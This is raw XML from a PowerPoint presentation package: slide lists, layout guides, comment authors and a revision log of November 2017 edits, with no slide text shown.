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9.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+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28"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId29"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="323" r:id="rId2"/>
    <p:sldId id="277" r:id="rId3"/>
    <p:sldId id="318" r:id="rId4"/>
    <p:sldId id="272" r:id="rId5"/>
    <p:sldId id="274" r:id="rId6"/>
    <p:sldId id="301" r:id="rId7"/>
    <p:sldId id="321" r:id="rId8"/>
    <p:sldId id="304" r:id="rId9"/>
    <p:sldId id="307" r:id="rId10"/>
    <p:sldId id="303" r:id="rId11"/>
    <p:sldId id="309" r:id="rId12"/>
    <p:sldId id="315" r:id="rId13"/>
    <p:sldId id="311" r:id="rId14"/>
    <p:sldId id="308" r:id="rId15"/>
    <p:sldId id="310" r:id="rId16"/>
    <p:sldId id="306" r:id="rId17"/>
    <p:sldId id="268" r:id="rId18"/>
    <p:sldId id="278" r:id="rId19"/>
    <p:sldId id="302" r:id="rId20"/>
    <p:sldId id="285" r:id="rId21"/>
    <p:sldId id="320" r:id="rId22"/>
    <p:sldId id="281" r:id="rId23"/>
    <p:sldId id="286" r:id="rId24"/>
    <p:sldId id="317" r:id="rId25"/>
    <p:sldId id="322" r:id="rId26"/>
    <p:sldId id="280" r:id="rId27"/>
  </p:sldIdLst>
  <p:sldSz cx="6858000" cy="9144000" type="letter"/>
  <p:notesSz cx="6781800" cy="90678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88" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="1440" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" pos="2880" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" orient="horz" pos="3600" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
      </p15:sldGuideLst>
    </p:ext>
    <p:ext uri="{2D200454-40CA-4A62-9FC3-DE9A4176ACB9}">
      <p15:notesGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main">
        <p15:guide id="1" orient="horz" pos="2857" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="213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rsten" initials="T" lastIdx="96" clrIdx="0"/>
  <p:cmAuthor id="1" name="DorisTorsten" initials="D" lastIdx="0" clrIdx="1"/>
  <p:cmAuthor id="2" name="Andrew van der Stock" initials="AS" lastIdx="6" clrIdx="2">
    <p:extLst/>
  </p:cmAuthor>
  <p:cmAuthor id="3" name="office@enil.us" initials="o" lastIdx="1" clrIdx="3">
    <p:extLst/>
  </p:cmAuthor>
  <p:cmAuthor id="4" name="Andrew van der Stock" initials="AvdS" lastIdx="1"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8542"/>
    <a:srgbClr val="FC9803"/>
    <a:srgbClr val="83276B"/>
    <a:srgbClr val="D9EAD5"/>
    <a:srgbClr val="00FF00"/>
    <a:srgbClr val="B93A32"/>
    <a:srgbClr val="672E3B"/>
    <a:srgbClr val="FFFF00"/>
    <a:srgbClr val="B3D6AC"/>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D4F4EF-8154-4522-94CF-7BB22F3606B9}" v="1352" dt="2017-11-19T07:40:05.505"/>
    <p1510:client id="{9BCC7D08-3FF3-47C7-857B-A874886F641E}" v="973" dt="2017-11-19T02:21:00.2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365" autoAdjust="0"/>
    <p:restoredTop sz="95096" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="100" d="100"/>
          <a:sy n="100" d="100"/>
        </p:scale>
        <p:origin x="508" y="-328"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2688"/>
        <p:guide pos="1440"/>
        <p:guide pos="2880"/>
        <p:guide orient="horz" pos="36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1" d="100"/>
          <a:sy n="51" d="100"/>
        </p:scale>
        <p:origin x="-2802" y="-108"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2857"/>
        <p:guide pos="2137"/>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briel Lawrence" userId="4d24c77f19546939" providerId="LiveId" clId="{8840B8BB-2388-403A-87C8-D7EE3254AED6}"/>
    <pc:docChg chg="undo custSel modSld">
      <pc:chgData name="Gabriel Lawrence" userId="4d24c77f19546939" providerId="LiveId" clId="{8840B8BB-2388-403A-87C8-D7EE3254AED6}" dt="2017-11-10T00:53:26.885" v="476" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Gabriel Lawrence" userId="4d24c77f19546939" providerId="LiveId" clId="{8840B8BB-2388-403A-87C8-D7EE3254AED6}" dt="2017-11-10T00:53:26.885" v="476" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2097789725" sldId="310"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Gabriel Lawrence" userId="4d24c77f19546939" providerId="LiveId" clId="{8840B8BB-2388-403A-87C8-D7EE3254AED6}" dt="2017-11-10T00:52:40.806" v="473" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2097789725" sldId="310"/>
            <ac:spMk id="108" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Gabriel Lawrence" userId="4d24c77f19546939" providerId="LiveId" clId="{8840B8BB-2388-403A-87C8-D7EE3254AED6}" dt="2017-11-10T00:53:26.885" v="476" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2097789725" sldId="310"/>
            <ac:spMk id="109" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Gabriel Lawrence" userId="4d24c77f19546939" providerId="LiveId" clId="{8840B8BB-2388-403A-87C8-D7EE3254AED6}" dt="2017-11-10T00:30:09.753" v="4" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2097789725" sldId="310"/>
            <ac:spMk id="137" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}"/>
    <pc:docChg chg="undo custSel modSld">
      <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T06:43:08.882" v="280" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-09T21:11:43.663" v="2" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3544603407" sldId="303"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="mod modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-09T21:11:43.663" v="2" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3544603407" sldId="303"/>
            <ac:graphicFrameMk id="34" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T06:06:30.787" v="277" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3458964653" sldId="304"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T06:06:30.787" v="277" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3458964653" sldId="304"/>
            <ac:spMk id="108" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addCm modCm">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-09T22:27:07.206" v="4" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="370214010" sldId="307"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T02:07:22.198" v="48" actId="6549"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1310475506" sldId="308"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T02:07:22.198" v="48" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1310475506" sldId="308"/>
            <ac:spMk id="107" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T02:05:22.473" v="44" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2097789725" sldId="310"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T02:05:22.473" v="44" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2097789725" sldId="310"/>
            <ac:spMk id="108" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T06:10:22.255" v="279" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="872923206" sldId="318"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T06:10:22.255" v="279" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="872923206" sldId="318"/>
            <ac:graphicFrameMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T05:56:59.255" v="156" actId="12"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1698158142" sldId="320"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T05:54:53.027" v="51" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1698158142" sldId="320"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T05:55:45.268" v="89" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1698158142" sldId="320"/>
            <ac:spMk id="10" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T05:55:53.509" v="92" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1698158142" sldId="320"/>
            <ac:spMk id="11" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T05:55:51.510" v="91" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1698158142" sldId="320"/>
            <ac:spMk id="13" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T05:55:48.735" v="90" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1698158142" sldId="320"/>
            <ac:spMk id="14" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T05:55:24.799" v="87" actId="207"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1698158142" sldId="320"/>
            <ac:graphicFrameMk id="9" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:graphicFrameChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T05:56:59.255" v="156" actId="12"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1698158142" sldId="320"/>
            <ac:graphicFrameMk id="12" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T06:43:08.882" v="280" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1107843752" sldId="322"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T06:43:08.882" v="280" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1107843752" sldId="322"/>
            <ac:graphicFrameMk id="7" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T00:51:14.149" v="8" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2323774989" sldId="323"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T00:51:14.149" v="8" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2323774989" sldId="323"/>
            <ac:spMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}"/>
    <pc:docChg chg="undo custSel addSld delSld modSld modNotesMaster modHandout">
      <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:46:00.142" v="3537" actId="2696"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T06:55:18.710" v="2922" actId="313"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="268"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T06:55:18.710" v="2922" actId="313"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="268"/>
            <ac:graphicFrameMk id="34" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:20:28.372" v="3037" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="272"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:20:28.372" v="3037" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="272"/>
            <ac:graphicFrameMk id="7" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:graphicFrameChg chg="mod modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:19:46.995" v="3029" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="272"/>
            <ac:graphicFrameMk id="10" creationId="{006EF41C-22F0-4CD0-98DC-529189A47945}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:16:22.467" v="2991" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="274"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="mod modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:16:22.467" v="2991" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="274"/>
            <ac:graphicFrameMk id="12" creationId="{53BBC665-1B35-4A1D-B9C5-F23A146454B3}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:29:01.072" v="3112" actId="554"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="277"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:29:01.072" v="3112" actId="554"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="277"/>
            <ac:graphicFrameMk id="10" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:graphicFrameChg chg="mod modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:29:01.072" v="3112" actId="554"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="277"/>
            <ac:graphicFrameMk id="11" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-18T18:40:41.969" v="2253" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="278"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-14T05:24:27.780" v="2138" actId="120"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="278"/>
            <ac:spMk id="8" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-18T18:40:41.969" v="2253" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="278"/>
            <ac:spMk id="12" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-14T05:46:51.408" v="2141" actId="113"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="281"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-14T05:46:51.408" v="2141" actId="113"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="281"/>
            <ac:graphicFrameMk id="7" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-18T18:37:10.988" v="2233" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="285"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-18T18:37:10.988" v="2233" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="285"/>
            <ac:graphicFrameMk id="9" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:graphicFrameChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-12T00:06:18.095" v="299" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="285"/>
            <ac:graphicFrameMk id="12" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp del">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:46:00.142" v="3537" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="212467395" sldId="293"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-13T03:51:31.189" v="595" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="212467395" sldId="293"/>
            <ac:spMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-13T03:51:24.427" v="593" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="212467395" sldId="293"/>
            <ac:spMk id="12" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-18T17:33:43.112" v="2153" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1135468893" sldId="296"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-12T00:09:03.062" v="327" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="321167381" sldId="301"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-12T00:09:03.062" v="327" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="321167381" sldId="301"/>
            <ac:graphicFrameMk id="69" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:12:33.903" v="2954" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3544603407" sldId="303"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:12:33.903" v="2954" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3544603407" sldId="303"/>
